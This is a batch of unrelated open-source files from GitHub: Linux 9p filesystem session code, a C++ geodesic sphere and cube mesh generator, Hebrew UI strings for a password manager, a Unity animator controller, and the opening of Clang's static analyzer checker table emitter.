{Opt_nodevmap, "nodevmap"},
{Opt_cache, "cache=%s"},
{Opt_cache_loose, "loose"},
{Opt_fscache, "fscache"},
{Opt_mmap, "mmap"},
{Opt_cachetag, "cachetag=%s"},
{Opt_access, "access=%s"},
{Opt_posixacl, "posixacl"},
{Opt_err, NULL}
};
/* Interpret mount options for cache mode */
static int get_cache_mode(char *s)
{
int version = -EINVAL;
if (!strcmp(s, "loose")) {
version = CACHE_LOOSE;
p9_debug(P9_DEBUG_9P, "Cache mode: loose\n");
} else if (!strcmp(s, "fscache")) {
version = CACHE_FSCACHE;
p9_debug(P9_DEBUG_9P, "Cache mode: fscache\n");
} else if (!strcmp(s, "mmap")) {
version = CACHE_MMAP;
p9_debug(P9_DEBUG_9P, "Cache mode: mmap\n");
} else if (!strcmp(s, "none")) {
version = CACHE_NONE;
p9_debug(P9_DEBUG_9P, "Cache mode: none\n");
} else
pr_info("Unknown Cache mode %s\n", s);
return version;
}
/**
* v9fs_parse_options - parse mount options into session structure
* @v9ses: existing v9fs session information
*
* Return 0 upon success, -ERRNO upon failure.
*/
static int v9fs_parse_options(struct v9fs_session_info *v9ses, char *opts)
{
char *options, *tmp_options;
substring_t args[MAX_OPT_ARGS];
char *p;
int option = 0;
char *s, *e;
int ret = 0;
/* setup defaults */
v9ses->afid = ~0;
v9ses->debug = 0;
v9ses->cache = CACHE_NONE;
#ifdef CONFIG_9P_FSCACHE
v9ses->cachetag = NULL;
#endif
if (!opts)
return 0;
tmp_options = kstrdup(opts, GFP_KERNEL);
if (!tmp_options) {
ret = -ENOMEM;
goto fail_option_alloc;
}
options = tmp_options;
while ((p = strsep(&options, ",")) != NULL) {
int token, r;
if (!*p)
continue;
token = match_token(p, tokens, args);
switch (token) {
case Opt_debug:
r = match_int(&args[0], &option);
if (r < 0) {
p9_debug(P9_DEBUG_ERROR,
"integer field, but no integer?\n");
ret = r;
continue;
}
v9ses->debug = option;
#ifdef CONFIG_NET_9P_DEBUG
p9_debug_level = option;
#endif
break;
case Opt_dfltuid:
r = match_int(&args[0], &option);
if (r < 0) {
p9_debug(P9_DEBUG_ERROR,
"integer field, but no integer?\n");
ret = r;
continue;
}
v9ses->dfltuid = make_kuid(current_user_ns(), option);
if (!uid_valid(v9ses->dfltuid)) {
p9_debug(P9_DEBUG_ERROR,
"uid field, but not a uid?\n");
ret = -EINVAL;
continue;
}
break;
case Opt_dfltgid:
r = match_int(&args[0], &option);
if (r < 0) {
p9_debug(P9_DEBUG_ERROR,
"integer field, but no integer?\n");
ret = r;
continue;
}
v9ses->dfltgid = make_kgid(current_user_ns(), option);
if (!gid_valid(v9ses->dfltgid)) {
p9_debug(P9_DEBUG_ERROR,
"gid field, but not a gid?\n");
ret = -EINVAL;
continue;
}
break;
case Opt_afid:
r = match_int(&args[0], &option);
if (r < 0) {
p9_debug(P9_DEBUG_ERROR,
"integer field, but no integer?\n");
ret = r;
continue;
}
v9ses->afid = option;
break;
case Opt_uname:
kfree(v9ses->uname);
v9ses->uname = match_strdup(&args[0]);
if (!v9ses->uname) {
ret = -ENOMEM;
goto free_and_return;
}
break;
case Opt_remotename:
kfree(v9ses->aname);
v9ses->aname = match_strdup(&args[0]);
if (!v9ses->aname) {
ret = -ENOMEM;
goto free_and_return;
}
break;
case Opt_nodevmap:
v9ses->nodev = 1;
break;
case Opt_cache_loose:
v9ses->cache = CACHE_LOOSE;
break;
case Opt_fscache:
v9ses->cache = CACHE_FSCACHE;
break;
case Opt_mmap:
v9ses->cache = CACHE_MMAP;
break;
case Opt_cachetag:
#ifdef CONFIG_9P_FSCACHE
v9ses->cachetag = match_strdup(&args[0]);
#endif
break;
case Opt_cache:
s = match_strdup(&args[0]);
if (!s) {
ret = -ENOMEM;
p9_debug(P9_DEBUG_ERROR,
"problem allocating copy of cache arg\n");
goto free_and_return;
}
ret = get_cache_mode(s);
if (ret == -EINVAL) {
kfree(s);
goto free_and_return;
}
v9ses->cache = ret;
kfree(s);
break;
case Opt_access:
s = match_strdup(&args[0]);
if (!s) {
ret = -ENOMEM;
p9_debug(P9_DEBUG_ERROR,
"problem allocating copy of access arg\n");
goto free_and_return;
}
v9ses->flags &= ~V9FS_ACCESS_MASK;
if (strcmp(s, "user") == 0)
v9ses->flags |= V9FS_ACCESS_USER;
else if (strcmp(s, "any") == 0)
v9ses->flags |= V9FS_ACCESS_ANY;
else if (strcmp(s, "client") == 0) {
v9ses->flags |= V9FS_ACCESS_CLIENT;
} else {
uid_t uid;
v9ses->flags |= V9FS_ACCESS_SINGLE;
uid = simple_strtoul(s, &e, 10);
if (*e != '\0') {
ret = -EINVAL;
pr_info("Unknown access argument %s\n",
s);
kfree(s);
goto free_and_return;
}
v9ses->uid = make_kuid(current_user_ns(), uid);
if (!uid_valid(v9ses->uid)) {
ret = -EINVAL;
pr_info("Uknown uid %s\n", s);
kfree(s);
goto free_and_return;
}
}
kfree(s);
break;
case Opt_posixacl:
#ifdef CONFIG_9P_FS_POSIX_ACL
v9ses->flags |= V9FS_POSIX_ACL;
#else
p9_debug(P9_DEBUG_ERROR,
"Not defined CONFIG_9P_FS_POSIX_ACL. Ignoring posixacl option\n");
#endif
break;
default:
continue;
}
}
free_and_return:
kfree(tmp_options);
fail_option_alloc:
return ret;
}
/**
* v9fs_session_init - initialize session
* @v9ses: session information structure
* @dev_name: device being mounted
* @data: options
*
*/
struct p9_fid *v9fs_session_init(struct v9fs_session_info *v9ses,
const char *dev_name, char *data)
{
struct p9_fid *fid;
int rc = -ENOMEM;
v9ses->uname = kstrdup(V9FS_DEFUSER, GFP_KERNEL);
if (!v9ses->uname)
goto err_names;
v9ses->aname = kstrdup(V9FS_DEFANAME, GFP_KERNEL);
if (!v9ses->aname)
goto err_names;
init_rwsem(&v9ses->rename_sem);
rc = bdi_setup_and_register(&v9ses->bdi, "9p");
if (rc)
goto err_names;
v9ses->uid = INVALID_UID;
v9ses->dfltuid = V9FS_DEFUID;
v9ses->dfltgid = V9FS_DEFGID;
v9ses->clnt = p9_client_create(dev_name, data);
if (IS_ERR(v9ses->clnt)) {
rc = PTR_ERR(v9ses->clnt);
p9_debug(P9_DEBUG_ERROR, "problem initializing 9p client\n");
goto err_bdi;
}
v9ses->flags = V9FS_ACCESS_USER;
if (p9_is_proto_dotl(v9ses->clnt)) {
v9ses->flags = V9FS_ACCESS_CLIENT;
v9ses->flags |= V9FS_PROTO_2000L;
} else if (p9_is_proto_dotu(v9ses->clnt)) {
v9ses->flags |= V9FS_PROTO_2000U;
}
rc = v9fs_parse_options(v9ses, data);
if (rc < 0)
goto err_clnt;
v9ses->maxdata = v9ses->clnt->msize - P9_IOHDRSZ;
if (!v9fs_proto_dotl(v9ses) &&
((v9ses->flags & V9FS_ACCESS_MASK) == V9FS_ACCESS_CLIENT)) {
/*
* We support ACCESS_CLIENT only for dotl.
* Fall back to ACCESS_USER
*/
v9ses->flags &= ~V9FS_ACCESS_MASK;
v9ses->flags |= V9FS_ACCESS_USER;
}
/*FIXME !! */
/* for legacy mode, fall back to V9FS_ACCESS_ANY */
if (!(v9fs_proto_dotu(v9ses) || v9fs_proto_dotl(v9ses)) &&
((v9ses->flags&V9FS_ACCESS_MASK) == V9FS_ACCESS_USER)) {
v9ses->flags &= ~V9FS_ACCESS_MASK;
v9ses->flags |= V9FS_ACCESS_ANY;
v9ses->uid = INVALID_UID;
}
if (!v9fs_proto_dotl(v9ses) ||
!((v9ses->flags & V9FS_ACCESS_MASK) == V9FS_ACCESS_CLIENT)) {
/*
* We support ACL checks on clinet only if the protocol is
* 9P2000.L and access is V9FS_ACCESS_CLIENT.
*/
v9ses->flags &= ~V9FS_ACL_MASK;
}
fid = p9_client_attach(v9ses->clnt, NULL, v9ses->uname, INVALID_UID,
v9ses->aname);
if (IS_ERR(fid)) {
rc = PTR_ERR(fid);
p9_debug(P9_DEBUG_ERROR, "cannot attach\n");
goto err_clnt;
}
if ((v9ses->flags & V9FS_ACCESS_MASK) == V9FS_ACCESS_SINGLE)
fid->uid = v9ses->uid;
else
fid->uid = INVALID_UID;
#ifdef CONFIG_9P_FSCACHE
/* register the session for caching */
v9fs_cache_session_get_cookie(v9ses);
#endif
spin_lock(&v9fs_sessionlist_lock);
list_add(&v9ses->slist, &v9fs_sessionlist);
spin_unlock(&v9fs_sessionlist_lock);
return fid;
err_clnt:
p9_client_destroy(v9ses->clnt);
err_bdi:
bdi_destroy(&v9ses->bdi);
err_names:
kfree(v9ses->uname);
kfree(v9ses->aname);
return ERR_PTR(rc);
}
/**
* v9fs_session_close - shutdown a session
* @v9ses: session information structure
*
*/
void v9fs_session_close(struct v9fs_session_info *v9ses)
{
if (v9ses->clnt) {
p9_client_destroy(v9ses->clnt);
v9ses->clnt = NULL;
}
#ifdef CONFIG_9P_FSCACHE
if (v9ses->fscache) {
v9fs_cache_session_put_cookie(v9ses);
kfree(v9ses->cachetag);
}
#endif
kfree(v9ses->uname);
kfree(v9ses->aname);
bdi_destroy(&v9ses->bdi);
spin_lock(&v9fs_sessionlist_lock);
list_del(&v9ses->slist);
spin_unlock(&v9fs_sessionlist_lock);
}
/**
* v9fs_session_cancel - terminate a session
* @v9ses: session to terminate
*
* mark transport as disconnected and cancel all pending requests.
*/
void v9fs_session_cancel(struct v9fs_session_info *v9ses) {
p9_debug(P9_DEBUG_ERROR, "cancel session %p\n", v9ses);
p9_client_disconnect(v9ses->clnt);
}
/**
* v9fs_session_begin_cancel - Begin terminate of a session
* @v9ses: session to terminate
*
* After this call we don't allow any request other than clunk.
*/
void v9fs_session_begin_cancel(struct v9fs_session_info *v9ses)
{
p9_debug(P9_DEBUG_ERROR, "begin cancel session %p\n", v9ses);
p9_client_begin_disconnect(v9ses->clnt);
}
extern int v9fs_error_init(void);
static struct kobject *v9fs_kobj;
#ifdef CONFIG_9P_FSCACHE
/**
* caches_show - list caches associated with a session
*
* Returns the size of buffer written.
*/
static ssize_t caches_show(struct kobject *kobj,
struct kobj_attribute *attr,
char *buf)
{
ssize_t n = 0, count = 0, limit = PAGE_SIZE;
struct v9fs_session_info *v9ses;
spin_lock(&v9fs_sessionlist_lock);
list_for_each_entry(v9ses, &v9fs_sessionlist, slist) {
if (v9ses->cachetag) {
n = snprintf(buf, limit, "%s\n", v9ses->cachetag);
if (n < 0) {
count = n;
break;
}
count += n;
limit -= n;
}
}
spin_unlock(&v9fs_sessionlist_lock);
return count;
}
static struct kobj_attribute v9fs_attr_cache = __ATTR_RO(caches);
#endif /* CONFIG_9P_FSCACHE */
static struct attribute *v9fs_attrs[] = {
#ifdef CONFIG_9P_FSCACHE
&v9fs_attr_cache.attr,
#endif
NULL,
};
static struct attribute_group v9fs_attr_group = {
.attrs = v9fs_attrs,
};
/**
* v9fs_sysfs_init - Initialize the v9fs sysfs interface
*
*/
static int __init v9fs_sysfs_init(void)
{
v9fs_kobj = kobject_create_and_add("9p", fs_kobj);
if (!v9fs_kobj)
return -ENOMEM;
if (sysfs_create_group(v9fs_kobj, &v9fs_attr_group)) {
kobject_put(v9fs_kobj);
return -ENOMEM;
}
return 0;
}
/**
* v9fs_sysfs_cleanup - Unregister the v9fs sysfs interface
*
*/
static void v9fs_sysfs_cleanup(void)
{
sysfs_remove_group(v9fs_kobj, &v9fs_attr_group);
kobject_put(v9fs_kobj);
}
static void v9fs_inode_init_once(void *foo)
{
struct v9fs_inode *v9inode = (struct v9fs_inode *)foo;
#ifdef CONFIG_9P_FSCACHE
v9inode->fscache = NULL;
#endif
memset(&v9inode->qid, 0, sizeof(v9inode->qid));
inode_init_once(&v9inode->vfs_inode);
}
/**
* v9fs_init_inode_cache - initialize a cache for 9P
* Returns 0 on success.
*/
static int v9fs_init_inode_cache(void)
{
v9fs_inode_cache = kmem_cache_create("v9fs_inode_cache",
sizeof(struct v9fs_inode),
0, (SLAB_RECLAIM_ACCOUNT|
SLAB_MEM_SPREAD|SLAB_ACCOUNT),
v9fs_inode_init_once);
if (!v9fs_inode_cache)
return -ENOMEM;
return 0;
}
/**
* v9fs_destroy_inode_cache - destroy the cache of 9P inode
*
*/
static void v9fs_destroy_inode_cache(void)
{
/*
* Make sure all delayed rcu free inodes are flushed before we
* destroy cache.
*/
rcu_barrier();
kmem_cache_destroy(v9fs_inode_cache);
}
static int v9fs_cache_register(void)
{
int ret;
ret = v9fs_init_inode_cache();
if (ret < 0)
return ret;
#ifdef CONFIG_9P_FSCACHE
ret = fscache_register_netfs(&v9fs_cache_netfs);
if (ret < 0)
v9fs_destroy_inode_cache();
#endif
return ret;
}
static void v9fs_cache_unregister(void)
{
v9fs_destroy_inode_cache();
#ifdef CONFIG_9P_FSCACHE
fscache_unregister_netfs(&v9fs_cache_netfs);
#endif
}
/**
* init_v9fs - Initialize module
*
*/
static int __init init_v9fs(void)
{
int err;
pr_info("Installing v9fs 9p2000 file system support\n");
/* TODO: Setup list of registered trasnport modules */
err = v9fs_cache_register();
if (err < 0) {
pr_err("Failed to register v9fs for caching\n");
return err;
}
err = v9fs_sysfs_init();
if (err < 0) {
pr_err("Failed to register with sysfs\n");
goto out_cache;
}
err = register_filesystem(&v9fs_fs_type);
if (err < 0) {
pr_err("Failed to register filesystem\n");
goto out_sysfs_cleanup;
}
return 0;
out_sysfs_cleanup:
v9fs_sysfs_cleanup();
out_cache:
v9fs_cache_unregister();
return err;
}
/**
* exit_v9fs - shutdown module
*
*/
static void __exit exit_v9fs(void)
{
v9fs_sysfs_cleanup();
v9fs_cache_unregister();
unregister_filesystem(&v9fs_fs_type);
}
module_init(init_v9fs)
module_exit(exit_v9fs)
MODULE_AUTHOR("Latchesar Ionkov <[email protected]>");
MODULE_AUTHOR("Eric Van Hensbergen <[email protected]>");
MODULE_AUTHOR("Ron Minnich <[email protected]>");
MODULE_LICENSE("GPL");
| {
"pile_set_name": "Github"
} |
// Copyright 2015 XLGAMES Inc.
//
// Distributed under the MIT License (See
// accompanying file "LICENSE" or the website
// http://www.opensource.org/licenses/mit-license.php)
#include "VisualisationGeo.h"
#include "../../RenderCore/Metal/InputLayout.h"
#include "../../RenderCore/Metal/Format.h"
namespace ToolsRig
{
namespace Internal
{
static RenderCore::Metal::InputElementDesc Vertex2D_InputLayout_[] = {
RenderCore::Metal::InputElementDesc( "POSITION", 0, RenderCore::Metal::NativeFormat::R32G32_FLOAT ),
RenderCore::Metal::InputElementDesc( "TEXCOORD", 0, RenderCore::Metal::NativeFormat::R32G32_FLOAT )
};
static RenderCore::Metal::InputElementDesc Vertex3D_InputLayout_[] = {
RenderCore::Metal::InputElementDesc( "POSITION", 0, RenderCore::Metal::NativeFormat::R32G32B32_FLOAT ),
RenderCore::Metal::InputElementDesc( "NORMAL", 0, RenderCore::Metal::NativeFormat::R32G32B32_FLOAT ),
RenderCore::Metal::InputElementDesc( "TEXCOORD", 0, RenderCore::Metal::NativeFormat::R32G32_FLOAT ),
RenderCore::Metal::InputElementDesc( "TEXTANGENT", 0, RenderCore::Metal::NativeFormat::R32G32B32A32_FLOAT )//,
//RenderCore::Metal::InputElementDesc( "TEXBITANGENT", 0, RenderCore::Metal::NativeFormat::R32G32B32_FLOAT )
};
}
std::pair<const RenderCore::Metal::InputElementDesc*, size_t> Vertex2D_InputLayout = std::make_pair(Internal::Vertex2D_InputLayout_, dimof(Internal::Vertex2D_InputLayout_));
std::pair<const RenderCore::Metal::InputElementDesc*, size_t> Vertex3D_InputLayout = std::make_pair(Internal::Vertex3D_InputLayout_, dimof(Internal::Vertex3D_InputLayout_));
static void GeodesicSphere_Subdivide(const Float3 &v1, const Float3 &v2, const Float3 &v3, std::vector<Float3> &sphere_points, unsigned int depth)
{
if(depth == 0)
{
sphere_points.push_back(v1);
sphere_points.push_back(v2);
sphere_points.push_back(v3);
return;
}
Float3 v12 = Normalize(v1 + v2);
Float3 v23 = Normalize(v2 + v3);
Float3 v31 = Normalize(v3 + v1);
GeodesicSphere_Subdivide( v1, v12, v31, sphere_points, depth - 1);
GeodesicSphere_Subdivide( v2, v23, v12, sphere_points, depth - 1);
GeodesicSphere_Subdivide( v3, v31, v23, sphere_points, depth - 1);
GeodesicSphere_Subdivide(v12, v23, v31, sphere_points, depth - 1);
}
static std::vector<Float3> BuildGeodesicSpherePts(int detail)
{
//
// Basic geodesic sphere generation code
// Based on a document from http://www.opengl.org.ru/docs/pg/0208.html
//
const float X = 0.525731112119133606f;
const float Z = 0.850650808352039932f;
const Float3 vdata[12] =
{
Float3( -X, 0.0, Z ), Float3( X, 0.0, Z ), Float3( -X, 0.0, -Z ), Float3( X, 0.0, -Z ),
Float3( 0.0, Z, X ), Float3( 0.0, Z, -X ), Float3( 0.0, -Z, X ), Float3( 0.0, -Z, -X ),
Float3( Z, X, 0.0 ), Float3( -Z, X, 0.0 ), Float3( Z, -X, 0.0 ), Float3( -Z, -X, 0.0 )
};
int tindices[20][3] =
{
{ 0, 4, 1 }, { 0, 9, 4 }, { 9, 5, 4 }, { 4, 5, 8 }, { 4, 8, 1 },
{ 8, 10, 1 }, { 8, 3, 10 }, { 5, 3, 8 }, { 5, 2, 3 }, { 2, 7, 3 },
{ 7, 10, 3 }, { 7, 6, 10 }, { 7, 11, 6 }, { 11, 0, 6 }, { 0, 1, 6 },
{ 6, 1, 10 }, { 9, 0, 11 }, { 9, 11, 2 }, { 9, 2, 5 }, { 7, 2, 11 }
};
std::vector<Float3> spherePoints;
for(int i = 0; i < 20; i++) {
// note -- flip here to flip the winding
GeodesicSphere_Subdivide(
vdata[tindices[i][0]], vdata[tindices[i][2]],
vdata[tindices[i][1]], spherePoints, detail);
}
return spherePoints;
}
std::vector<Internal::Vertex3D> BuildGeodesicSphere(int detail)
{
// build a geodesic sphere at the origin with radius 1 //
auto pts = BuildGeodesicSpherePts(detail);
std::vector<Internal::Vertex3D> result;
result.reserve(pts.size());
const float texWrapsX = 8.f;
const float texWrapsY = 4.f;
for (auto i=pts.cbegin(); i!=pts.cend(); ++i) {
Internal::Vertex3D vertex;
vertex._position = *i;
vertex._normal = Normalize(*i); // centre is the origin, so normal points towards the position
// Texture coordinates based on longitude / latitude
// 2 texture wraps horizontally, and 1 wrap vertically
// let's map [-0.5f*pi, .5f*pi] -> [0.f, 1.f];
float latitude = XlASin((*i)[2]);
float longitude = XlATan2((*i)[1], (*i)[0]);
latitude = 1.f - (latitude + .5f * gPI) / gPI * texWrapsY;
longitude = (longitude + .5f * gPI) / gPI * (texWrapsX / 2.f);
vertex._texCoord = Float2(longitude, latitude);
Float3 bt(0.f, 0.f, -1.f);
bt = bt - vertex._normal * Dot(vertex._normal, bt);
if (MagnitudeSquared(bt) < 1e-3f) {
// this a vertex on a singularity (straight up or straight down)
vertex._tangent = Float4(0.f, 0.f, 0.f, 0.f);
// vertex._bitangent = Float3(0.f, 0.f, 0.f);
} else {
bt = Normalize(bt);
// vertex._bitangent = bt;
// cross(bitangent, tangent) * handiness == normal, so...
Float3 t = Normalize(Cross(vertex._normal, bt));
vertex._tangent = Expand(t, 1.f);
auto test = Float3(Cross(bt, Truncate(vertex._tangent)) * vertex._tangent[3]);
assert(Equivalent(test, vertex._normal, 1e-4f));
// tangent should also be the 2d cross product of the XY position (according to the shape of a sphere)
auto test2 = Normalize(Float3(-(*i)[1], (*i)[0], 0.f));
assert(Equivalent(test2, Truncate(vertex._tangent), 1e-4f));
// make sure handiness is right
// assert(Equivalent(vertex._bitangent[2], 0.f, 1e-4f));
// auto testLong = XlATan2((*i)[1] + 0.05f * vertex._bitangent[1], (*i)[0] + 0.05f * vertex._bitangent[0]);
// testLong = (testLong + .5f * gPI) / gPI;
// assert(testLong > longitude);
}
result.push_back(vertex);
}
// there is a problem case on triangles that wrap around in longitude. Along these triangles, the
// texture coordinates will appear to wrap backwards through the entire texture. We can use the
// tangents to find these triangles, because the tangents will appear to be in the wrong direction
// for these triangles.
unsigned triCount = unsigned(result.size() / 3);
for (unsigned t=0; t<triCount; ++t) {
auto& A = result[t*3+0];
auto& B = result[t*3+1];
auto& C = result[t*3+2];
// problems around the singularity straight up or straight down
if (MagnitudeSquared(A._tangent) < 1e-4f || MagnitudeSquared(B._tangent) < 1e-4f || MagnitudeSquared(C._tangent) < 1e-4f)
continue;
if (XlAbs(B._texCoord[0] - A._texCoord[0]) > 1e-3f) {
assert(Dot(Truncate(B._tangent), Truncate(A._tangent)) > 0.f); // both tangents should point in roughly the same direction
bool rightWay1 = (Dot(B._position - A._position, Truncate(A._tangent)) < 0.f) == ((B._texCoord[0] - A._texCoord[0]) < 0.f);
if (!rightWay1) {
if (B._texCoord[0] < A._texCoord[0]) B._texCoord[0] += texWrapsX;
else A._texCoord[0] += texWrapsX;
}
}
if (XlAbs(C._texCoord[0] - A._texCoord[0]) > 1e-3f) {
assert(Dot(Truncate(C._tangent), Truncate(A._tangent)) > 0.f); // both tangents should point in roughly the same direction
bool rightWay1 = (Dot(C._position - A._position, Truncate(A._tangent)) < 0.f) == ((C._texCoord[0] - A._texCoord[0]) < 0.f);
if (!rightWay1) {
if (C._texCoord[0] < A._texCoord[0]) C._texCoord[0] += texWrapsX;
else A._texCoord[0] += texWrapsX;
}
}
if (XlAbs(C._texCoord[0] - B._texCoord[0]) > 1e-3f) {
assert(Dot(Truncate(C._tangent), Truncate(B._tangent)) > 0.f); // both tangents should point in roughly the same direction
bool rightWay1 = (Dot(C._position - B._position, Truncate(B._tangent)) < 0.f) == ((C._texCoord[0] - B._texCoord[0]) < 0.f);
if (!rightWay1) {
if (C._texCoord[0] < B._texCoord[0]) C._texCoord[0] += texWrapsX;
else B._texCoord[0] += texWrapsX;
}
}
}
return result;
}
std::vector<Internal::Vertex3D> BuildCube()
{
// build a basic cube at the origing with radius 1. All edges are "sharp" edges //
Float3 normals[] = {
Float3(0.f, 0.f, -1.f), Float3(0.f, 0.f, 1.f),
Float3(1.f, 0.f, 0.f), Float3(-1.f, 0.f, 0.f),
Float3(0.f, 1.f, 0.f), Float3(0.f, -1.f, 0.f)
};
Float3 Us[] = {
Float3(1.f, 0.f, 0.f), Float3(-1.f, 0.f, 0.f),
Float3(0.f, 1.f, 0.f), Float3(0.f, -1.f, 0.f),
Float3(-1.f, 0.f, 0.f), Float3(1.f, 0.f, 0.f)
};
Float3 Vs[] = {
Float3(0.f, 1.f, 0.f), Float3(0.f, 1.f, 0.f),
Float3(0.f, 0.f, -1.f), Float3(0.f, 0.f, -1.f),
Float3(0.f, 0.f, -1.f), Float3(0.f, 0.f, -1.f)
};
float faceCoord[4][2] = {{ -1.f, -1.f }, { -1.f, 1.f }, { 1.f, -1.f }, { 1.f, 1.f }};
std::vector<Internal::Vertex3D> result;
for (unsigned c=0; c<6; ++c) {
auto normal = normals[c], u = Us[c], v = Vs[c];
Internal::Vertex3D a[4];
for (unsigned q=0; q<4; ++q) {
a[q]._position = normal + faceCoord[q][0] * u + faceCoord[q][1] * v;
a[q]._normal = normal;
a[q]._texCoord = Float2(.5f * faceCoord[q][0] + .5f, .5f * faceCoord[q][1] + .5f);
a[q]._tangent = Expand(u, 1.f);
a[q]._tangent[3] = (Dot(Cross(v, u), normal) < 0.f) ? -1.f : 1.f;
// a[q]._bitangent = v;
}
result.push_back(a[0]); result.push_back(a[1]); result.push_back(a[2]);
result.push_back(a[2]); result.push_back(a[1]); result.push_back(a[3]);
}
return result;
}
}
| {
"pile_set_name": "Github"
} |
/* Title for alert dialog explaining that a user must be signed in to use AutoFill. */
"autofill.signInRequired" = "נדרשת התחברות";
/* Cancel button title */
"cancel" = "ביטול";
/* Delete button title */
"delete" = "מחיקה";
/* Ok button title */
"ok" = "אישור";
/* Sign in button text */
"signIn" = "התחברות";
/* This is the message displayed when syncing entries from the server times out */
"sync.timeout" = "תם הזמן שהוקצב לסנכרון";
/* Placeholder text when the user’s email is unavailable while unlocking the app, shown in Touch ID and passcode prompts */
"unlock_placeholder" = "פעולה זו תשחרר את היישומון.";
/* Placeholder text when there is no username. String should include appropriate open/close parenthetical or similar symbols to indicate this is a placeholder, not a real username. */
"username_placeholder" = "(אין שם משתמש)";
| {
"pile_set_name": "Github"
} |
%YAML 1.1
%TAG !u! tag:unity3d.com,2011:
--- !u!91 &9100000
AnimatorController:
m_ObjectHideFlags: 0
m_PrefabParentObject: {fileID: 0}
m_PrefabInternal: {fileID: 0}
m_Name: Ethan
serializedVersion: 5
m_AnimatorParameters: []
m_AnimatorLayers:
- serializedVersion: 5
m_Name: Base Layer
m_StateMachine: {fileID: 110785770}
m_Mask: {fileID: 0}
m_Motions: []
m_Behaviours: []
m_BlendingMode: 0
m_SyncedLayerIndex: -1
m_DefaultWeight: 0
m_IKPass: 0
m_SyncedLayerAffectsTiming: 0
m_Controller: {fileID: 9100000}
--- !u!1102 &110294526
AnimatorState:
serializedVersion: 5
m_ObjectHideFlags: 1
m_PrefabParentObject: {fileID: 0}
m_PrefabInternal: {fileID: 0}
m_Name: HumanoidRun
m_Speed: 1
m_CycleOffset: 0
m_Transitions: []
m_StateMachineBehaviours: []
m_Position: {x: 50, y: 50, z: 0}
m_IKOnFeet: 0
m_WriteDefaultValues: 1
m_Mirror: 0
m_SpeedParameterActive: 0
m_MirrorParameterActive: 0
m_CycleOffsetParameterActive: 0
m_Motion: {fileID: 7400000, guid: 1cb8ed3cbba15f0479fbae54e0a963df, type: 3}
m_Tag:
m_SpeedParameter:
m_MirrorParameter:
m_CycleOffsetParameter:
--- !u!1107 &110785770
AnimatorStateMachine:
serializedVersion: 5
m_ObjectHideFlags: 1
m_PrefabParentObject: {fileID: 0}
m_PrefabInternal: {fileID: 0}
m_Name: Base Layer
m_ChildStates:
- serializedVersion: 1
m_State: {fileID: 110294526}
m_Position: {x: 255, y: 78, z: 0}
m_ChildStateMachines: []
m_AnyStateTransitions: []
m_EntryTransitions: []
m_StateMachineTransitions: {}
m_StateMachineBehaviours: []
m_AnyStatePosition: {x: 50, y: 20, z: 0}
m_EntryPosition: {x: 50, y: 120, z: 0}
m_ExitPosition: {x: 800, y: 120, z: 0}
m_ParentStateMachinePosition: {x: 800, y: 20, z: 0}
m_DefaultState: {fileID: 110294526}
| {
"pile_set_name": "Github"
} |
//=- ClangSACheckersEmitter.cpp - Generate Clang SA checkers tables -*- C++ -*-
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This tablegen backend emits Clang Static Analyzer checkers tables.
//
//===----------------------------------------------------------------------===//
#include "llvm/ADT/DenseSet.h"
#include "llvm/TableGen/Error.h"
#include "llvm/TableGen/Record.h"
#include "llvm/TableGen/TableGenBackend.h"
#include <map>
#include <string>
using namespace llvm;
//===----------------------------------------------------------------------===//
// Static Analyzer Checkers Tables generation
//===----------------------------------------------------------------------===//
/// \brief True if it is specified hidden or a parent package is specified
/// as hidden, otherwise false.
static bool isHidden(const Record &R) {
if (R.getValueAsBit("Hidden"))
return true;
// Not declared as hidden, check the parent package if it is hidden.
if (DefInit *DI = dyn_cast<DefInit>(R.getValueInit("ParentPackage")))
return isHidden(*DI->getDef());
return false;
}
static bool isCheckerNamed(const Record *R) {
return !R->getValueAsString("CheckerName").empty();
}
static std::string getPackageFullName(const Record *R);
static std::string getParentPackageFullName(const Record *R) {
std::string name;
if (DefInit *DI = dyn_cast<DefInit>(R->getValueInit("ParentPackage")))
name = getPackageFullName(DI->getDef());
return name;
}
static std::string getPackageFullName(const Record *R) {
std::string name = getParentPackageFullName(R);
if (!name.empty()) name += ".";
return name + R->getValueAsString("PackageName");
}
static std::string getCheckerFullName(const Record *R) {
std::string name = getParentPackageFullName(R);
if (isCheckerNamed(R)) {
if (!name.empty()) name += ".";
name += R->getValueAsString("CheckerName");
}
return name;
}
static std::string getStringValue(const Record &R, StringRef field) {
if (StringInit *SI = dyn_cast<StringInit>(R.getValueInit(field)))
return SI->getValue();
return std::string();
}
namespace {
struct GroupInfo {
llvm::DenseSet<const Record*> Checkers;
llvm::DenseSet<const Record *> SubGroups;
bool Hidden;
unsigned Index;
GroupInfo() : Hidden(false) { }
};
}
static void addPackageToCheckerGroup(const Record *package, const Record *group,
llvm::DenseMap<const Record *, GroupInfo *> &recordGroupMap) {
llvm::DenseSet<const Record *> &checkers = recordGroupMap[package]->Checkers;
for (llvm::DenseSet<const Record *>::iterator
I = checkers.begin(), E = checkers.end(); I != E; ++I)
recordGroupMap[group]->Checkers.insert(*I);
llvm::DenseSet<const Record *> &subGroups = recordGroupMap[package]->SubGroups;
for (llvm::DenseSet<const Record *>::iterator
I = subGroups.begin(), E = subGroups.end(); I != E; ++I)
addPackageToCheckerGroup(*I, group, recordGroupMap);
}
namespace clang {
void EmitClangSACheckers(RecordKeeper &Records, raw_ostream &OS) {
std::vector<Record*> checkers = Records.getAllDerivedDefinitions("Checker");
llvm::DenseMap<const Record *, unsigned> checkerRecIndexMap;
for (unsigned i = 0, e = checkers.size(); i != e; ++i)
checkerRecIndexMap[checkers[i]] = i;
// Invert the mapping of checkers to package/group into a one to many
// mapping of packages/groups to checkers.
std::map<std::string, GroupInfo> groupInfoByName;
llvm::DenseMap<const Record *, GroupInfo *> recordGroupMap;
std::vector<Record*> packages = Records.getAllDerivedDefinitions("Package");
for (unsigned i = 0, e = packages.size(); i != e; ++i) {
Record *R = packages[i];
std::string fullName = getPackageFullName(R);
if (!fullName.empty()) {
GroupInfo &info = groupInfoByName[fullName];
info.Hidden = isHidden(*R);
recordGroupMap[R] = &info;
}
}
std::vector<Record*>
checkerGroups = Records.getAllDerivedDefinitions("CheckerGroup");
for (unsigned i = 0, e = checkerGroups.size(); i != e; ++i) {
Record *R = checkerGroups[i];
std::string name = R->getValueAsString("GroupName");
if (!name.empty()) {
GroupInfo &info = groupInfoByName[name];
recordGroupMap[R] = &info;
}
}
